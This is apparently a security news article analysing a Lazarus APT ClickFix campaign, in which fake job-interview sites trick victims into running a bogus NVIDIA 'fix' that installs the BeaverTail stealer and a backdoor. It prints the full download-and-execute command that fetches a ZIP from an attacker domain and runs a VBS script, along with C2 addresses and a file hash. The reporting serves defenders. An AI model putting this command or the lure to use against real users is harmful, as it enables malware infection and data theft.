Lazarus APT Hackers Using ClickFix Technique to Steal Sensitive Intelligence Data

The notorious Lazarus APT group has evolved its attack methodology by incorporating the increasingly popular ClickFix social engineering technique to distribute malware and steal sensitive intelligence data from targeted organizations.

This North Korean-linked threat actor, internally tracked as APT-Q-1 by security researchers, has demonstrated remarkable adaptability by integrating deceptive user interface manipulation with their traditional espionage operations.

The ClickFix technique represents a sophisticated social engineering approach where attackers present victims with fabricated technical issues, then guide them through seemingly legitimate “fixes” that actually execute malicious code.

Lazarus has weaponized this method within their established fake recruitment campaign infrastructure, creating a multi-layered attack vector that combines job opportunity lures with technical deception.

CN-SEC analysts identified this campaign through the discovery of a malicious batch script that downloads disguised NVIDIA software packages, which subsequently deploy the group’s signature BeaverTail information stealer.

The attack chain begins when victims are lured to fraudulent interview websites that prompt them to prepare their interview environment, eventually claiming camera configuration issues require immediate resolution.

The technical sophistication of this operation extends beyond simple social engineering. Victims are presented with what appears to be a legitimate NVIDIA driver update command, but the underlying payload morphs into a malicious execution sequence.

The primary infection vector utilizes a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure.

Recent analysis reveals that the group has expanded operations to target both Windows and macOS platforms, demonstrating cross-platform capabilities through tailored payloads for different operating system architectures.

The Windows variant focuses on enterprise environments through Node.js-based deployment mechanisms, while macOS versions utilize shell scripts designed for Apple Silicon and Intel processors.

Malware Deployment and Persistence Mechanisms

The core malware package, distributed as “nvidiaRelease[.]zip” (MD5: f9e18687a38e968811b93351e9fca089), contains multiple components designed for cross-platform compatibility and persistent access.

The initial ClickFix-1.bat script executes the following command sequence:-

curl - k - o "%TEMP%\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\nvidiaRelease'" && cscript "%TEMP%\nvidiaRelease\run[.]vbs"

The extracted archive deploys run[.]vbs, which performs system reconnaissance to determine the Windows build number.

For Windows 11 systems (build 22000 or higher), the script additionally executes drvUpdate[.]exe, a sophisticated backdoor capable of command execution and file manipulation.

This binary establishes communication with command-and-control servers at 103.231.75.101:8888, implementing functions including system information collection, remote command execution, and file transfer capabilities.

Core Malware Components:-

The malware achieves persistence through registry modification, adding an entry to the Windows startup registry key that ensures execution across system reboots.

The BeaverTail component communicates with infrastructure at 45.159.248.110, demonstrating redundant command-and-control capabilities for maintaining long-term access to compromised systems.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.